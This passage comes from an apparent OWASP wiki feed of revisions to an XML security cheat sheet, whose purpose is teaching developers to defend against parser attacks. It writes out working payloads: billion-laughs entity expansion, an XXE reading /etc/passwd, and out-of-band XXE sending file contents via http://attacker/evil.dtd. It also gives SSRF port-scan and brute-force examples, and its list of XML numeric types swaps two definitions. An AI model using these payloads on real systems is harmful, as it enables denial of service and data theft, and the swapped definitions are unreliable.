  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224446</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224446"/>
				<updated>2016-12-21T21:13:02Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
